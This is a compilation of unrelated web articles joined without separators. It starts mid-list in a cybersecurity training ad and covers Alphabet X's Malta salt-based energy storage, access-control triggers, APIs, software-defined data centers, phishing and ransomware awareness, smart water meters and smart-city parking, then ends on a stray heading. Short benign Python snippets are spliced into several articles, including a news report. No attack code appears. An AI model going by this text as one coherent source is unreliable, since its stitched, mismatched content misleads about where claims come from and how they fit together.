  - Online conversation apps - getting students to learn means keeping them engaged, and that means making it easy for them to keep the conversation going. There are many online apps you can use to spark fresh conversation and keep your students using your learning resources. For example, Sli.do empowers remote students to ask questions in real time, answer polls, and feel truly engaged in the module content. Dyknow shares other popular tools designed to drive student engagement through ongoing, organic conversation.
  - Done-for-you online training platforms - creating content and managing an online learning environment for your hybrid learning program can be overwhelming. Add in the fact that cybersecurity is a rapidly changing industry where established wisdom can become obsolete almost overnight, and getting your students the most accurate training possible can be a serious challenge. Some educators in the cybersecurity industry have turned to done-for-you online training platforms, such as our Cyber Arcade. These solutions take the time, frustration, and pressure out of delivering timely, critical training to current and future cybersecurity pros.

Online training platforms eliminate the guesswork of knowing what each of your cybersecurity program students needs out of online training. Cybint Security Labs is designed to enhance your existing curriculum with practical, real-world exercises and training. By immersing themselves in real-life scenarios, students can develop the decision-making skills to succeed in their careers. There are more than 100 exercises in all - each one carefully curated by a team of professionals with extensive experience in the cybersecurity industry. They cover a wide range of topics that are critical in today's world, such as:

- Network admin and application security
- Incident handling and response
- Ethical hacking
- Malware analysis
- Threat intelligence
- Risk management
- And many others

Check out our Cyber Arcade today to find out how simple done-for-you online cybersecurity training can be. You'll have the peace of mind of knowing your students have all the knowledge they need, right at their fingertips.
Mark Bergen (Bloomberg) — Alphabet Inc.'s secretive X skunk works has another idea that could save the world. This one, code named Malta, involves vats of salt and antifreeze.

The research lab, which hatched Google's driverless car almost a decade ago, is developing a system for storing renewable energy that would otherwise be wasted. It can be located almost anywhere, has the potential to last longer than lithium-ion batteries, and can compete on price with new hydroelectric plants and other existing clean energy storage methods, according to X executives and researchers.

The previously undisclosed initiative is part of a handful of energy projects at X, which has a mixed record with audacious "moonshots" like Google Glass and drone delivery. Venture capitalists, and increasingly governments, have cut funding and support for technology and businesses built around alternatives to fossil fuels. X's clean-energy projects have yet to become hits like its driverless cars, but the lab isn't giving up.

"If the moonshot factory gives up on a big, important problem like climate change, then maybe it will never get solved," said Obi Felten, a director at X. "If we do start solving it, there are trillions and trillions of dollars in market opportunity."

She runs The Foundry, where a Malta team of fewer than 10 researchers is testing a stripped-down prototype. This is the part of X that tries to turn experiments in science labs into full-blown projects with emerging business models, such as its Loon internet-beaming high-altitude balloons. Malta is not yet an official X project, but it has been "de-risked" enough that the team is now looking for partners to build, operate and connect a commercial-sized prototype to the grid, Felten said. That means Alphabet may team up or compete with industrial powerhouses like Siemens AG, ABB Ltd. and General Electric Co.

X is stepping into a market that could see about $40 billion in investment by 2024, according to Bloomberg New Energy Finance. Roughly 790 megawatts of storage capacity will be added this year, and overall capacity is expected to hit 45 gigawatts within seven years, BNEF estimates.

Existing electrical grids struggle with renewable energy, a vexing problem that's driving demand for new storage methods. Solar panels and wind farms churn out energy around midday and at night, when demand lulls. This forces utilities to discard it in favor of more predictable oil and coal plants and more controllable natural gas "peaker" plants. In the first half of this year, California tossed out more than 300,000 megawatt-hours produced by solar panels and wind farms because there's no good way to store it. That's enough to power tens of thousands of homes. About 4 percent of all wind energy from Germany was jettisoned in 2015, according to Bloomberg New Energy Finance. China throws out more than 17 percent.

Felten is particularly excited about working with companies in China, a voracious energy consumer — and a country where almost all Google web services are banned.

Before that happens, the Malta team has to turn what is now an early test prototype in a warehouse in Silicon Valley into a final product that can be manufactured and is big and reliable enough for utilities to plug into electricity grids. In renderings viewed by Bloomberg News, the system looks like a miniature power plant with four cylindrical tanks connected via pipes to a heat pump.
X says it can vary in size from roughly the dimensions of a large garage to a full-scale traditional power plant, providing energy on demand to huge industrial facilities and data centers, or storage for small wind farms and solar installations. The system mixes an established technique with newly designed components. "Think of this, at a very simple level, as a fridge and a jet," said Julian Green, the product manager for Malta.

Two tanks are filled with salt, and two are filled with antifreeze or a hydrocarbon liquid. The system takes in energy in the form of electricity and turns it into separate streams of hot and cold air. The hot air heats up the salt, while the cold air cools the antifreeze, a bit like a refrigerator. The jet engine part: flip a switch and the process reverses. Hot and cold air rush toward each other, creating powerful gusts that spin a turbine and spit out electricity when the grid needs it. Salt maintains its temperature well, so the system can store energy for many hours, and even days, depending on how much you insulate the tanks.

Scientists have already proven this a plausible storage technique. Malta's contribution was to design a system that operates at lower temperatures, so it doesn't require specialized, expensive ceramics and steels. "The thermodynamic physics are well-known to anyone who studied it enough in college," Green said. "The trick is doing it at the right temperatures, with cheap materials. That is super compelling."

X declined to share exactly how cheap its materials are. Thermal salt-based storage has the potential to be several times cheaper than lithium-ion batteries and other existing grid-scale storage technologies, said Raj Apte, Malta's head engineer. German engineering firm Siemens is also developing storage systems using salt for its solar-thermal plants. But lithium-ion battery prices are falling quickly, according to Bloomberg New Energy Finance. And Malta must contend with low oil and natural gas prices, a market reality that's wiped out several companies working on alternatives to fossil fuels.

"It could potentially compete with lithium-ion," said Bloomberg New Energy Finance analyst Yayoi Sekine. "But there are a lot of challenges that an emerging technology has to face."

One hurdle is convincing energy incumbents to put capital into a project with potential returns many years down the road. Alphabet has the balance sheet to inspire confidence, with $95 billion in cash and equivalents. Yet the tech giant has a recent history of retreating from or shutting experimental projects that stray from its core areas of high-power computing and software.

Robert Laughlin, a Nobel prize-winning physicist whose research laid the foundation for Malta, is now a consultant on the project. He met X representatives at a conference a few years ago. They discussed the idea, and the lab ultimately decided to fund the project and build a small team to execute it. Laughlin has signed off on the team's designs, and he says the prototype has been performing in line with his theories.

Laughlin believes X is more committed than previous potential backers. He first pitched the idea as his own startup, taking it to luminary tech investors including Khosla Ventures and Peter Thiel's Founders Fund. They passed, according to the scientist, because they didn't want to deal with the tougher demands of a conservative energy industry that will have to buy and use the system in the end.
"What we're talking about here is engines and oil companies — big dinosaurs with very long teeth," said Laughlin. That's "above the pay grade of people out here."

A representative from Founders Fund declined to comment. Khosla didn't respond to requests for comment.

X won't say how much it has invested so far, but it's enough for Laughlin. "A blessing came out of the sky," he said. "X came in and took a giant bite out of this problem."
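To get a feel for the sensible-heat physics behind Malta's salt tanks, here is a back-of-the-envelope sketch. Every number in it is an illustrative assumption (X has not published Malta's specifications), and the round-trip efficiency is a placeholder for a pumped-heat cycle:

```python
# Back-of-the-envelope sensible-heat estimate: Q = m * c_p * dT.
# All values below are assumptions for illustration, not Malta specs.

SALT_MASS_KG = 1_000_000         # assumed: 1,000 tonnes of salt
SPECIFIC_HEAT_J_PER_KG_K = 1500  # assumed: typical for molten nitrate salts
DELTA_T_K = 200                  # assumed temperature swing of the hot tanks
ROUND_TRIP_EFFICIENCY = 0.5      # assumed electricity-to-electricity efficiency

def stored_heat_mwh(mass_kg: float, c_p: float, delta_t: float) -> float:
    """Sensible heat in MWh (1 MWh = 3.6e9 joules)."""
    return mass_kg * c_p * delta_t / 3.6e9

heat = stored_heat_mwh(SALT_MASS_KG, SPECIFIC_HEAT_J_PER_KG_K, DELTA_T_K)
print(f"Thermal energy stored: {heat:.0f} MWh")                            # ~83 MWh
print(f"Recoverable electricity: {heat * ROUND_TRIP_EFFICIENCY:.0f} MWh")  # ~42 MWh
```

Under these assumptions, a thousand tonnes of salt holds on the order of a few dozen megawatt-hours of dispatchable electricity, which is why tank size and insulation dominate the design.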
What is the difference between triggers, procedures and BluSKY Rules?

A transaction is an event detected by the EP controller and logged for reporting to the host. In Mercury's terminology, a trigger is the occurrence of a specified transaction in the system; when a trigger fires, it invokes a procedure. A procedure is a sequence of one or more actions performed when the procedure is called upon to execute, where each action represents a control command such as relay control or door unlock.

A BluSKY Rule is similar to a trigger-and-procedure pair: when an event occurs and is reported to BluSKY by the EP controller, the rule runs a specified action in BluSKY, which can include calling a procedure on the controller. The key difference is where each runs. A BluSKY Rule runs from BluSKY, whereas triggers and procedures are configured in BluSKY but synced to the EP controller, where they run.
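To make the relationship concrete, here is a purely illustrative sketch of how a trigger maps a transaction to a procedure's actions. This is explanatory pseudo-configuration only; it is not actual Mercury or BluSKY syntax:

```python
# Illustrative model of the trigger -> procedure relationship.
# All names and structures here are invented for explanation.

PROCEDURES = {
    "unlock_lobby": [
        ("door_unlock", {"door": "lobby_main"}),
        ("relay_on", {"relay": 3}),
    ],
}

TRIGGERS = [
    # When this transaction type is seen, invoke the named procedure.
    {"transaction": "access_granted_lobby", "procedure": "unlock_lobby"},
]

def on_transaction(transaction_type: str) -> None:
    """Runs on the controller: match triggers, execute procedure actions."""
    for trigger in TRIGGERS:
        if trigger["transaction"] == transaction_type:
            for action, params in PROCEDURES[trigger["procedure"]]:
                print(f"executing {action} with {params}")

on_transaction("access_granted_lobby")
```

A BluSKY Rule would sit one level up: the same kind of matching logic, but evaluated in BluSKY after the controller reports the event, rather than on the controller itself.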
APIs are the primary means by which applications, firmware and online processes share data. They make life easier for developers and underpin many of the services we rely on every day, from social networks to online banks.

What is an API?

An API, or Application Programming Interface, sets out the kinds of demands that one system can make of another, including the format in which those demands should be made. It could, for example, be used to determine how a human resources platform requests salary data from an accounting system. Equally, it could control how a wearable shares workout data with a smartphone or writes it to the cloud.

How APIs make easy work of integrations

Unless they're produced by the same developer, there's no reason why any two systems should be coded to be compatible. But by making various data points accessible in response to an API call, the accounting system in our example above can surface tagged but otherwise plain-language data for use in third-party processes without itself understanding how those processes work. This saves the developers of either system from coding import or export tools for every conceivable third-party service. Instead, they can focus on optimising their own platform. An API allows developers to expose a subset of their data and leave third parties to work out how they want to use it.

"It can be helpful to think of the API as a way for different apps to talk to one another," says Mailchimp. But it's equally important to remember that these 'apps' aren't restricted to traditional software. APIs can also be used to interrogate hardware: for example, to return the state of an IoT device, such as whether a Wi-Fi-connected lightbulb is on or off, or the temperature detected by a thermostat.

What is an API key?

Some data is sensitive. Other data is valuable. Systems that provide an API interface frequently want to restrict access in such scenarios to either authorised or paying users. There are several means by which they can do this, including passwords and filtering on attributes like location or a device's MAC address. However, using an API key is among the most common. "An API key can act as a secret authentication token as well as a unique identifier," notes Last Call. "Typically, the key will come with a set of access rights for the API that it is associated with."

How API keys restrict access

A key is a unique code that identifies a particular project or application, and it must be supplied as part of the API call. Doing so allows the service to track which user or which process is accessing the API interface, so it can detect and prevent abuse, or accurately bill for its data. For example, a weather service that makes its data available via an API may have implemented a tiered pricing structure: a free tier allowing one call every hour, two paid tiers allowing one call every minute, and an unlimited number of calls. By assigning API keys to its subscribers, the weather provider can cap the number of valid updates provided in each instance in accordance with the subscriber's chosen tier.

Why API keys aren't used specifically for security

API keys are not a security tool in their own right.
A subscriber on our example weather service's 'unlimited' plan could share her key with a non-paying user, and the non-paying user would enjoy the same benefits unless the weather service itself had implemented additional validation and security protocols. Keys are therefore best thought of as a means of tracking resource use and, if applicable, using this to administer a granular pricing model.

What is an API call?

An API call is a line of code that bundles the API key (if applicable) with the location of the data the project wants to retrieve and any applicable variables. It can look much like a web address, as used in a browser.

The structure of an API call

The call itself consists of several parts. The most important is the endpoint: the location of the resource being requested, plus any relevant variables like the key and the fields required. If properly structured, this will be sufficient for the API gateway to return a human-readable, tagged array drawn from the API owner's data.

How API calls can be used

APIs can also be used to send data, as well as retrieve it, in which case the variables that comprise the API call will be received by the API gateway and handed off to an internal system for storage or manipulation. As well as the endpoint, an API call may therefore specify:

- whether it is a request for data
- a submission of new data
- an amendment to data already in place.

What is an API gateway?

The first device to encounter an incoming API call is the API gateway which, as described by RedHat, "sits between a client and a collection of backend services". It interprets the contents of the call, identifies the resources required to satisfy it, and delivers a response. This response could be a batch of data, a confirmation that incoming data has been received, or an error message. API errors can occur if the limits of an API key have been exceeded or the user is not authorised, among other scenarios.

How does an API gateway work?

The gateway acts as a junction between external user calls and the internal system of the API owner. It therefore provides a consistent interface and a predictable endpoint for external users, even if the back end, which manages the data being requested or written, changes over time. This gives developers the ability to maintain their core services in whichever manner best fits their operating model. Updated documentation need only be provided to end-users if the parameters expected by the gateway change.

What is API testing?

It's important to ensure that every part of a system is thoroughly tested and verified, and that ongoing changes are subjected to similar scrutiny. This is as true for an API as it is for the visible interface and the hidden back-end. Without adequate testing, there's no certainty that requests will be correctly answered, or that incoming data received by the API will be accurately parsed and acted upon. As explained by SmartBear, API testing "generally consists of… requests to a single or sometimes multiple API endpoints [to] validate the response" and emphasizes "testing of business logic, data responses and security, and performance bottlenecks". These latter points are particularly pertinent: even if the data handling is accurate, undetected performance issues could cause a service to loop or stall as it consumes excessive resources in responding to a call. This can put all internal and external processes that rely on an API at risk.
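To tie the pieces together, here is a minimal sketch of an authenticated API call against the hypothetical weather service used throughout this article. The endpoint, field names, and key are invented for illustration; the pattern of endpoint plus key plus variables is the point:

```python
# A minimal sketch of an authenticated API call. The weather service,
# its endpoint, and its parameters are hypothetical.
import requests

API_KEY = "your-api-key-here"  # placeholder, not a real key
ENDPOINT = "https://api.example-weather.com/v1/current"

response = requests.get(
    ENDPOINT,
    params={"city": "Halifax", "fields": "temp,humidity", "api_key": API_KEY},
    timeout=10,
)

if response.status_code == 429:
    # The gateway enforces the key's tier: too many calls for this plan.
    print("Rate limit exceeded for this API key's pricing tier")
elif response.ok:
    data = response.json()  # tagged, human-readable structure
    print(data)
else:
    print(f"API error: {response.status_code}")
```

A 429 response is the conventional HTTP status for "too many requests", which is one way a gateway can signal that a key has exhausted its tier's allowance.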
What is a software-defined data center?

Virtualization, automation, and the use of infrastructure as a service (IaaS) have led to the new data center standard: the software-defined data center (SDDC), in which software, rather than hardware, becomes the focus.

While software plays the key role in SDDCs, hardware is still required; it simply looks quite different from the hardware in traditional environments. Whereas legacy data centers rely on lots of proprietary hardware (from HP, IBM, EMC, and Dell, among others) to manage myriad devices, an SDDC uses mostly commodity hardware, available from traditional vendors like Dell and HPE or from other players like Super Micro and Quanta.

With an SDDC, a company can operate a data center with fewer people. The reason is simple: SDDCs eliminate traditional resource islands in favor of a software-powered matrix that makes the software layer responsible for everything.
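As a purely illustrative sketch of what "the software layer responsible for everything" means in practice, here is infrastructure declared as code against an imaginary SDDC management API. The types and the provisioning call are invented for this example; real SDDC stacks expose analogous programmable interfaces:

```python
# Hypothetical illustration of infrastructure-as-code in an SDDC.
# Nothing here is a real vendor API.
from dataclasses import dataclass

@dataclass
class VirtualMachine:
    name: str
    cpus: int
    memory_gb: int
    network: str

def provision(vm: VirtualMachine) -> None:
    # In a real SDDC, this call would hit the management layer's API,
    # which carves compute, storage, and networking out of commodity
    # hardware pools -- no per-device proprietary tooling involved.
    print(f"provisioning {vm.name}: {vm.cpus} vCPU / {vm.memory_gb} GB on {vm.network}")

provision(VirtualMachine("web-01", cpus=4, memory_gb=16, network="dmz"))
```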
Phishing Awareness: How Does It Happen And How To Prevent It

Why Do Criminals Use A Phishing Attack?

What's the biggest security vulnerability in an organization? Its people. Whenever criminals want to infect a computer or gain access to important information like account numbers, passwords, or PINs, all they have to do is ask. Phishing attacks are commonplace because they are:

- Easy to do – a 6-year-old child could perform a phishing attack.
- Scalable – they range from spear-phishing attacks that hit one person to attacks on an entire organization.
- Very effective – 74% of organizations have experienced a successful phishing attack.

Stolen credentials also fetch real money on the black market. Typical going rates include:

- Gmail account credentials – $80
- Credit card PIN – $20
- Online bank credentials for accounts with at least $100 in them – $40
- Bank accounts with at least $2,000 – $120

You're probably thinking, "Wow, my accounts are going for the bottom dollar!" And this is true. Other types of accounts go for a much higher price tag because they make it easier to keep money transfers anonymous. Accounts that hold crypto are the jackpot for phishing scammers. The going rates for crypto accounts are:

- Coinbase – $610
- Blockchain.com – $310
- Binance – $410

There are also non-financial reasons for phishing attacks. Phishing can be used by nation-states to hack into other countries and mine their data, to settle personal vendettas, or even to destroy the reputations of corporations or political enemies. The reasons for phishing attacks are endless.

How Does A Phishing Attack Start?

A phishing attack usually starts with the criminal coming right out and messaging you. They may contact you by phone call, email, instant message, or SMS, claiming to be someone working for a bank, another company you do business with, a government agency, or even someone in your own organization. A phishing email might ask you to click on a link or download and execute a file. You may think it's a legitimate message, click the link inside, and log in to what appears to be the website of the organization you trust. At this point the phishing scam is complete: you've handed over your private information to the attacker.

How To Prevent A Phishing Attack

The main strategy for avoiding phishing attacks is to train employees and build organizational awareness. Many phishing attacks look like legitimate emails and can pass through a spam filter or similar security filters. At first glance, the message or the website might look real, using a known logo, layout, and so on. Luckily, detecting phishing attacks is not so difficult.

The first thing to look out for is the sender's address. If the sender address is a variation on a website domain that you are used to, proceed with caution and don't click anything in the email body. Look at the address you'll be redirected to if there are links; watch out for links that, when hovered over, show a domain that differs from the company supposedly sending the email. To be safe, type the address of the organization you want to visit into the browser yourself, or use browser favorites.

Read the content of the message carefully, and be skeptical of all messages asking you to submit your private data, verify information, fill out forms, or download and run files. Don't let the content of the message fool you: attackers often try to scare you into clicking a link, or offer a reward to get your personal data.
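The "hover over the link" advice above can be made mechanical. Here is a minimal sketch that flags a link whose actual destination host is not the domain you expect (the sample URLs are invented for illustration):

```python
# Flag links whose real destination host doesn't match the trusted domain.
from urllib.parse import urlparse

def link_looks_suspicious(href: str, trusted_domain: str) -> bool:
    """True unless the link's host is the trusted domain or a subdomain of it."""
    host = urlparse(href).netloc.lower()
    return not (host == trusted_domain or host.endswith("." + trusted_domain))

print(link_looks_suspicious("https://login.mybank.com/reset", "mybank.com"))             # False
print(link_looks_suspicious("https://mybank.com.secure-login.xyz/reset", "mybank.com"))  # True
```

The second example shows the classic trick of embedding the trusted name as a subdomain of an attacker-controlled domain, which a naive substring check would miss.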
During a pandemic or national emergency, phishing scammers will take advantage of people's fears and use the subject line or message body to scare you into taking action and clicking a link. Also check for bad spelling or grammar in the email message or website. Keep in mind that most trusted companies will not ask you to send sensitive data via web forms or mail. That's why you should never click on suspicious links or provide any sort of sensitive data.

What Do I Do If I Receive A Phishing Email?

If you receive a message that appears to be a phishing attack, you have three options:

- Delete it.
- Verify the message content by contacting the organization through its traditional channel of communication.
- Forward the message to your IT security department for further analysis.

Your company should already be screening and filtering the majority of suspicious emails, but anyone can become a victim. Unfortunately, phishing scams are a growing threat on the internet, and the bad guys are always developing new tactics to get through to your inbox. Keep in mind that in the end, you're the last and most important layer of defense against phishing attempts.

How To Stop A Phishing Attack Before It Happens

Since phishing attacks rely on human error to be effective, the best option is to train the people in your business on how to avoid taking the bait. This doesn't mean you have to hold a big meeting or seminar on how to avoid a phishing attack. There are better ways to find gaps in your security and improve your human response to phishing.

2 Steps You Can Take To Prevent A Phishing Scam

Step 1. Run A Phishing Simulation

A phishing simulator is software that allows you to simulate a phishing attack on all of the members of your organization. Phishing simulators typically come with templates to help disguise the email as a trusted vendor or mimic internal email formats. They don't just create the email; they also help set up the fake website where recipients will end up entering their credentials if they don't pass the test. Rather than scolding people for falling into a trap, the best way to handle the situation is to provide information on how to assess phishing emails in the future. If someone fails a phishing test, just send them a list of tips on spotting phishing emails. You can even use this article as a reference for your employees.

Another major benefit of a good phishing simulator is that you can measure the human threat in your organization, which is often hard to predict. It can take up to a year and a half to train employees to a safe level of mitigation.

It's important to choose the right phishing simulation infrastructure for your needs. If you are running phishing simulations across one business, your task will be easier. If you are an MSP or MSSP, you may need to run phishing tests across multiple businesses and locations, in which case a cloud-based solution would be the best option for running multiple campaigns. Many phishing simulators come in the traditional SaaS model with tight contracts attached, but GoPhish on AWS is a cloud-based service where you pay at a metered rate rather than signing a 1- or 2-year contract.

Step 2. Security Awareness Training

A key benefit of giving employees security awareness training is protecting them from identity theft, bank theft, and stolen business credentials. Security awareness training is essential to improve employees' ability to spot phishing attempts.
Courses can help train staff to detect phishing attempts, but only a few focus on small businesses. It can be tempting, as a small business owner, to cut the cost of a course by sending around some YouTube videos about security awareness, but staff rarely remember that type of training for more than a few days. Hailbytes offers a course that combines quick videos and quizzes so you can track your employees' progress, prove that security measures are in place, and massively cut your chances of suffering a phishing scam.

If you are interested in running a free phishing simulation to train your employees, head to AWS and check out GoPhish! It's easy to get started, and you can always reach out to us if you need help getting set up.
The ever-changing landscape of technology is a fascinating sight to see, but not all the players are working for good. The emergence of stunning virtual reality and helpful software also attracts hackers. Follow these steps to stay safe from ransomware attacks and defend personal information.

The Goals of Ransomware

The United States saw 3,728 people or organizations fall victim to ransomware attacks in 2021, with tens of millions of dollars lost. These strikes are serious and can cost their targets large amounts of money. Ransomware's goal is to extract a ransom using stolen information: through a seemingly safe download, attackers gain access to their victim's data and then threaten them until they are paid.

One method of ransomware attack is the locking approach. Once inside, the attacker freezes all functions of the keyboard and mouse, and a pop-up covers the screen demanding money, or else the data will be deleted or sold to another buyer.

The other method many attackers use is crypto-ransomware. Here, the attacker encrypts the victim's files with keys only the attacker holds, so the owner can no longer access them. Files begin to show extensions like .crypt or .encrypted.

Thankfully, there are ways to prevent these attacks and build a security plan. Understanding how attackers install ransomware onto their targets' devices is vital. Phishing schemes in emails can contain links and attachments that carry ransomware. They are often disguised as messages from friends or innocent senders, and their appearance tries to lull the victim into a sense of safety before striking. Users should also be wary of "drive-by downloads": frequenting insecure websites may expose you to ransomware that downloads automatically, even if you have not clicked on anything suspicious.

Steps to Protect Against Ransomware

Thankfully, there are several ways to stay safe from ransomware attacks. Take these steps to secure your data.

1. Keep Software up to Date

Ransomware evolves and tries to maneuver around security measures, so users must match this with a level of precaution. Most tech enthusiasts already have security software installed on their devices, but everyone needs update reminders so their programs can run as efficiently as possible. Additionally, consider configuring automatic scans to run at set intervals, which ensures nothing slips through the cracks.

2. Back Data Up

Security software is vital, but a proactive approach requires proper backups. Seek a cloud service that places copies of documents onto a third-party server. If a hacker compromises the original copy and the home computer, the user can simply wipe the device and ignore the attacker's threats, confident that the documents are still safe in the cloud. However, be sure the backups are secure as well: research third-party cloud platforms and stay updated on their security protocols.

3. Stay on Secure Networks

Though the coffee shop Wi-Fi is enticing, it may put you at risk of ransomware attacks. Free, public Wi-Fi is often not as secure as home or employer networks, so only use devices with sensitive information at home or in trusted settings. If there is no way around using public Wi-Fi, a VPN can ensure a secure connection away from home and the office.

4. Maintain Password Security

Create long passwords that appear random. For maximum security, experts recommend using a passphrase of four unexpected yet memorable words strung together.
Multifactor authentication, password managers and security questions are also good options to maintain privacy on all accounts.

5. Click with Caution

Always use caution when opening links and email attachments. Remember that ransomware attackers disguise their strikes as familiar or friendly faces to trick their targets. Even if the sender seems authentic, double-check their address to verify the email's validity.

6. Get Educated

Educating oneself on proper security practices is a good habit to build. Notifications from the Cybersecurity and Infrastructure Security Agency (CISA) update users on new ransomware targeting practices and offer additional advice for protection. Business owners should consider adding ransomware training for employees as well: knowing how to recognize a spam email or suspicious link can greatly improve company data security.

What to Do if an Attack Occurs

If a ransomware attacker has breached your security measures, the next steps depend on the type of device. People whose personal devices have been affected need help from an authority like the FBI. Employees on work computers should contact IT and security professionals in their internal offices. After professional help has removed the ransomware, change all passwords and update your security measures.

Staying Safe From Ransomware

Ransomware seems like a scary prospect to many people, but with the right education and tools anyone can protect themselves from these threats. Follow these steps to maximize security on all devices and build an impenetrable wall against ransomware attacks.
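To make step 4's passphrase advice concrete, here is a minimal sketch of a four-word passphrase generator. The tiny word list is a stand-in; a real implementation would draw from a large list such as the EFF diceware list:

```python
# Generate a passphrase of four random, memorable words.
import secrets

# Stand-in word list; use a large published list in practice.
WORDS = ["copper", "galaxy", "mitten", "harbor", "velvet", "cactus",
         "ribbon", "tundra", "magnet", "quiver", "walnut", "ember"]

def make_passphrase(n_words: int = 4) -> str:
    # secrets.choice is cryptographically secure, unlike random.choice.
    return "-".join(secrets.choice(WORDS) for _ in range(n_words))

print(make_passphrase())  # e.g., "harbor-ember-quiver-cactus"
```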
How are IoT and Smart Meters Uplifting the Water Industry?

What are smart water meters?

Smart water meters are pieces of advanced infrastructure that create a two-way interaction with a utility's information management system. These meters enable customers and water suppliers to share information with each other, empowering both parties to take useful, practical actions. Such advanced metering infrastructure is now the need of the hour, especially in cities, due to rapid urbanization and growing water scarcity driven by climate change. Using these meters, cities can balance supply and demand efficiently.

How do (IoT) smart water meters work?

By using modern information and communication technologies (ICTs) such as the Internet of Things, water utilities are now managing their already limited water supply. This paradigm shift toward cutting-edge IoT solutions enables water suppliers to accomplish two major goals.

First, these systems help them reduce water losses across the entire distribution network. According to a World Bank study, more than 32 billion cubic meters of water is lost every year, most of it as non-revenue water. Non-revenue water refers to treated, sanitized, processed, and supplied water that is lost during distribution and never reaches, or is never billed to, end consumers.

Second, these ICT-powered solutions allow utilities to track and manage the demand for water. This demand management helps utilities make the best use of existing supplies. Utilities can also forecast when their water resources will run out and plan for the future accordingly, which supports the conservation of water resources and helps provide everyone with sufficient potable water.

Role of Smart Water Meters

An essential component of any IoT-based water monitoring solution is its smart water meters. These meters allow utilities to regularly read customers' meters from remote locations, helping them provide customers with fresh, drinkable water around the clock and identify water losses in the system. Currently, many cities around the world use automatic meter readers (AMRs), which rely on one-way communication to help utilities monitor end-users' water consumption in real time. Smart water meters, by contrast, offer two-way communication that creates a data-sharing network between the meters and the utility's information system. These smart meters provide not only the benefits of remote meter reading, but also let consumers examine the consumption data sent back to them by their water supplier, so customers can develop their own strategies to lower their water costs.

Benefits of using smart water meter based IoT solutions

Both for water suppliers and consumers, IoT smart water meters offer numerous benefits.
Let us explore them one by one:

- Benefits for utilities:
- Leak identification
- Energy reduction and saving
- Demand forecasting and planning
- Statistically informed water-saving awareness campaigns
- Promotion of efficient appliances
- Monitoring of performance indicators

- Benefits for consumers:
- Reduced water bills
- Water consumption monitoring
- Water consumption comparison against other customers
- Rationing of water based on consumption thresholds
- Rationing of water based on time of day

Additionally, automatic water metering helps in analyzing socio-demographic factors and then balancing supply and demand conditions. This also strengthens a city's water distribution network and ensures its efficient management. Check our previous article to find other challenges in the water industry.

Application of Smart Water Meters in Cities

The Public Utilities Board (PUB) of Singapore has recently rolled out a network of smart water meters. The main purpose of these IoT-driven devices is to record water consumption data. By analyzing this data, the city expects to build customer consumption profiles and identify consumption patterns and trends. The city also wants to share these profiles with customers so that they can understand their water inefficiencies and manage consumption properly. Singapore's PUB further plans to use this network for an engagement strategy that incentivizes customers to save water, all part of the PUB's plan to engage consumers and motivate them to conserve water and reduce tariffs.

The San Francisco Public Utilities Commission (SFPUC) has installed similar automated water meters in more than 96% of the city's 178,000 water accounts. These meters transfer water consumption information over a wireless network, which the utility uses to bill users. The readings help the utility see, hour by hour and down to the cubic foot, where the water it produces is being consumed. The reliable data gathered from these systems also helps users monitor their own consumption and detect potential leaks faster than manual methods allow. SFPUC has developed a web portal where users can download their daily and monthly water consumption and learn ways to conserve water. The commission also uses the hourly consumption data to notify residents of important news such as water cuts, and to alert customers about probable leaks, via email, text, or phone, if water has been running non-stop for three days.

A continuously growing population (especially in cities) and depleting water resources due to climate change have pushed utilities toward smart-meter-based IoT solutions. These solutions allow utilities to ensure an efficient, demand-driven supply of water. They also empower customers to review their historical consumption data and take action to save water on a personal level: customers can identify water inefficiencies in their homes and set water-saving goals to further reduce their bills.

This article was written by Sanjeev Verma, the founder and CEO of Biz4Group, based out of Orlando. He has conceptualized the idea of the Biz4 brand and founded Biz4Group and Biz4Intellia. He has 20+ years of experience in boosting IT-based start-ups to success.
In the past, he has held leadership positions with Marriott Vacations, Disney, MasterCard, State Farm, and Oracle.
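Circling back to the SFPUC leak alerts described above, here is a minimal sketch of that detection rule: flag an account when hourly readings show water running non-stop for three days. The reading format and zero threshold are illustrative assumptions:

```python
# Flag an account if hourly meter readings show continuous use for 72 hours.
HOURS_IN_THREE_DAYS = 72

def probable_leak(hourly_usage_cubic_feet: list[float]) -> bool:
    """True if the last 72 hourly readings are all above zero."""
    recent = hourly_usage_cubic_feet[-HOURS_IN_THREE_DAYS:]
    return len(recent) == HOURS_IN_THREE_DAYS and all(u > 0 for u in recent)

# 72 hours of continuous low-level flow -> likely a running toilet or leak.
readings = [0.4] * 72
if probable_leak(readings):
    print("Notify customer: possible leak (continuous use for 3 days)")
```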
Downtown parking is a headache that plagues cities and drivers alike. In Halifax, street parking is at a minimum, and if you're lucky enough to find a spot you still need to feed the meter with old-fashioned cash. Larger cities in Canada and around the world have taken the pain out of parking by automating the payment process via smartphones. In Montreal, for example, the P$ service allows customers to pay for parking via a smartphone app. It even sends a text reminder 15 minutes before your parking time is up, so you can top up the payment and avoid a ticket.

In major metropolitan areas and smaller cities alike, governments are turning to smart technologies (cloud, high-speed optical networks, the Internet of Things (IoT), software-defined networking (SDN) and network functions virtualization (NFV)) in their quest to manage strained infrastructure with limited budgets. The global market for smart cities is booming: according to industry researcher Frost and Sullivan, it's expected to reach US$1.5 trillion by 2020. The investment signals governments' urgency to enhance the livability of their communities, according to Dan Pitt, executive director of the Open Networking Foundation. "The overarching theme for smart city projects is 'how do we use these new technologies to benefit the lives of everyone in the community, not just the digital know-it-alls?'"

As an important building block in smart cities, SDN enables a flexible infrastructure that can be dynamically programmed to serve different application types. Like the human brain's neural pathways, SDN and NFV are essential in making the smart city and its networks connect and talk to each other in a meaningful way, explains government advisor Daniele Loffreda in a recent Network World article. "It makes the network applications portable and upgradable with software, and it allows cities of all sizes the agility and scalability to tackle the needs and trends of the future as they arise."

Traffic congestion is one of many issues governments are working to solve with smart technology. In the United Kingdom, for example, the city of Bristol is looking at how big data can be used to crack common problems such as air pollution, traffic congestion and assisted living for the elderly.

It's still early days in the smart city revolution, however, and there are lots of technical hurdles, including lack of interoperability among products. But the greater challenges, suggests Pitt, are around ownership, funding, sustainable models and the role of various stakeholders, including citizens and vendors. "Some cities are entirely based on a single vendor's product line and they're really expensive options. But I've also seen some with a lot of open solutions and a lot of opportunity for vendor competition. Bristol has done a better job than most of including a non-technical community in the development of applications and uses."

The point, says Pitt, is that IT pros in municipalities need to start thinking about what kind of applications are right for their particular residents. If not, they risk being saddled with an expensive and inflexible infrastructure that doesn't serve the needs of the population. Worse still, he says, it might affect their competitiveness in attracting and retaining people. "People, especially the younger and more mobile population, will be more inclined to move to places that have a liveliness to them based on what they can do interacting with their fellow residents."
Computer Scientist Career Path & Training

